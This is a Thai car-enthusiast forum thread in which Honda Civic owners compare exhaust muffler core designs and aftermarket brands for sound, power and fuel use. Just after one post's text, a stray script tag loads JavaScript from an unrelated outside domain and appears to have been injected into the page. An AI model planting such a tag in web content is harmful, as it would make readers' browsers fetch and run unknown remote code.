พอดี ผมก็ 1.7 auto เหมือนกัน เพิ่งเปลี่ยนจากท่อเดิม เป็น spoon N1 ที่เขาขายกันในหน้าซื้อขาย ผมซื้อมา 1800+เดินท่อสเเตนเลสถึงพักกลาง 1400 = ทั้งหมด3200 ใช้มา 1เดือนกว่าๆ เสียงนุ่ม ทุ้มดี แต่รู้สึกมันอืด หน่อยๆ อ่ะ จะเปลี่ยนเป้นตัวไหนดีครับ ราคาเท่าไหร่ จัดจากที่ไหน แนะนำแบบเยอะๆ หน่อยก็ดีครับ เห็นว่าท่านเคยใช้เหมือนกัน เอาตามสเตปที่ท่านใช้ก็ได้ครับ ผมจะได้ไปทำบ้าง ที่สำคัญต้องเสียงไม่ดังนะครับ

ป.ล.อันที่จริงผมชอบเสียงตัวปัจจุบันที่ใส่อยู่มากๆนะครับ แต่หากว่ามันไม่เวิกค์อ่ะ ผมจะได้เปลี่ยนเสียตั้งแต่ตอนนี้ จะได้เตรียมโพสขาย spoon N1 ซะเลย

ช่วยแนะนำทาง PM ด้วยครับ


เปลี่ยนเป็นท่อนอกมือสอง FGK ใบใหญ่ๆ ไส้เยื้อง
เสียงนุ่มทุ้มเบากว่า Spoon เยอะเลยอ่ะคับ รับรองวิ่งไม่แตกต่างจากเดิม
ผมก็กำลังเก็บตังค์หาใส่อยู่เหมือนกันอ่ะคับ เสริมอีกนิดส์ด้วย เปลี่ยนกรองอากาศเป็น K&N แรงมาเลยทีนี้อ่ะคับ อิ อิ
ได้รับคำขอบคุณจาก: hacker  honeybeex7  SYS  tHe TW 
sayarm


ชื่อเล่น: หยาม

เข้าร่วม: 03 ตุลา 2008
ตอบ: 2229

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2543
ให้คำขอบคุณ: 4055

ที่อยู่: ระยอง (แต่คนพะเยา ^_^ )
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 9 กันยา 2010 11:02 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
AT ใส่ใส้ตรงอยู่อ่ะ จะหาเปลี่ยนใส้ย้อนเหมือนกัน ใส่ผิดสเป๊กมานานละ ทนๆขับไป ไม่แรงก็เหยียบคันเร่งเพิ่มเอา แหๆ
เปลืองแก๊ซดี
ได้รับคำขอบคุณจาก: musashi44  hacker  honeybeex7 
panukij


เข้าร่วม: 31 สิงหา 2010
ตอบ: 78

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 155
ให้คำขอบคุณ: 18

ที่อยู่: 70 ซ.ธรรมวิถี 3 ถ.ธรรมวิถี ต.ปากน้ำโพ อ.เมือง จ.นครสวรรค์ 60000
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 9 กันยา 2010 12:11 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
ข้อมูลแจ๋วจริงๆ เดี๋ยวต้องไปดูของเราบ้าง ไม่รู้ว่าไส้อะไร..แรงเป็นบ้าเลย (อิอิ..แรงดี..แต่ไม่มีแรง)


Attached File :
งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
honeybeex7


เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 9 กันยา 2010 13:40 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
sayarm พิมพ์ว่า:
AT ใส่ใส้ตรงอยู่อ่ะ จะหาเปลี่ยนใส้ย้อนเหมือนกัน ใส่ผิดสเป๊กมานานละ ทนๆขับไป ไม่แรงก็เหยียบคันเร่งเพิ่มเอา แหๆ
เปลืองแก๊ซดี



เหมือนผมเลยครับ อาศัยเหยียบคันเร่งเพิ่มเอา มันก็เเรงดีอยู่ เพิ่งรู้ว่าใส่ผิดนะเนี่ย
sayarm


ชื่อเล่น: หยาม

เข้าร่วม: 03 ตุลา 2008
ตอบ: 2229

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2543
ให้คำขอบคุณ: 4055

ที่อยู่: ระยอง (แต่คนพะเยา ^_^ )
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 9 กันยา 2010 14:15 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
เดี๋ยวหา FGK มาใส่มั่ง
ใครมีรีบมาปล่อยนะครับ
der1


เข้าร่วม: 26 สิงหา 2009
ตอบ: 309

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 190
ให้คำขอบคุณ: 305
พฤหัส, 9 กันยา 2010 17:09 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
แหล่มเลยลูกพี่
fatcows


ชื่อเล่น: หน่อย

เข้าร่วม: 04 มีนา 2010
ตอบ: 53

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 49
ให้คำขอบคุณ: 31

ที่อยู่: รังสิต ปทุมธานี- สุราษฎร์ธานี
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 9 กันยา 2010 17:28 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
honeybeex7 พิมพ์ว่า:
chanyut_t พิมพ์ว่า:
honeybeex7 พิมพ์ว่า:
ผมก็ auto ใส่ไส้ตรงบิดเกลียวอยู่อ่ะ ไม่รู้ว่าดีไหม หากว่าไม่เวิกร์จะได้ถอดขาย ใครรู้ช่วยตอบในกระทู้ หรือPM มาก็ได้ครับ


ของผม Auto 1.7 เคยใส่ไส้ตรงบิดเกลียว ออกตัวใช้รอบสูง ปลาย 180km...เหนื่อย (ในเมือง8-9 โล/ลิตร)
ตอนนี้ใช้ไส้เยื้อง ต้นมาเร็ว...ปลาย 200หน่อยๆ (ในเมือง12-13 โล/ลิตร) ส่วนตัวรู้สึกว่า Autoไส้ตรงจะโล่งไปครับ..






พอดี ผมก็ 1.7 auto เหมือนกัน เพิ่งเปลี่ยนจากท่อเดิม เป็น spoon N1 ที่เขาขายกันในหน้าซื้อขาย ผมซื้อมา 1800+เดินท่อสเเตนเลสถึงพักกลาง 1400 = ทั้งหมด3200 ใช้มา 1เดือนกว่าๆ เสียงนุ่ม ทุ้มดี แต่รู้สึกมันอืด หน่อยๆ อ่ะ จะเปลี่ยนเป้นตัวไหนดีครับ ราคาเท่าไหร่ จัดจากที่ไหน แนะนำแบบเยอะๆ หน่อยก็ดีครับ เห็นว่าท่านเคยใช้เหมือนกัน เอาตามสเตปที่ท่านใช้ก็ได้ครับ ผมจะได้ไปทำบ้าง ที่สำคัญต้องเสียงไม่ดังนะครับ

ป.ล.อันที่จริงผมชอบเสียงตัวปัจจุบันที่ใส่อยู่มากๆนะครับ แต่หากว่ามันไม่เวิกค์อ่ะ ผมจะได้เปลี่ยนเสียตั้งแต่ตอนนี้ จะได้เตรียมโพสขาย spoon N1 ซะเลย

ช่วยแนะนำทาง PM ด้วยครับ


ผมก็ใส่อยู่เหมือนกัน รู้สึกมันโล่งไปและกินน้ำมันมากขึ้นประมาณ 9-10 โลลิตร (ในเมือง)ท่อเดิมใบเก่าประมาณ 12-13 โลลิตร
นี่ก็กำลังหาใส้เยื้องมาใส่ ใครมีแหล่งหรือก็ช่วยทีครับ อยากเปลี่ยนท่อแล้ว
P.TER.357


เข้าร่วม: 06 มีนา 2010
ตอบ: 968

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 784
ให้คำขอบคุณ: 2902

ที่อยู่: เมืองทองธานี - บางใหญ่ นนทบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 9 กันยา 2010 17:50 - งงๆเรื่องท่อ ไส้ย้อน/ไส้เยื้อง/ไส้วน มันต่างกันอย่างไร ได้ข้อมูลมาแล้วครับ
FGK อีกเสียงคับ
เงียบดีคับ ไหลไปเรื่อยอะคับ
"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: honeybeex7  SYS 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.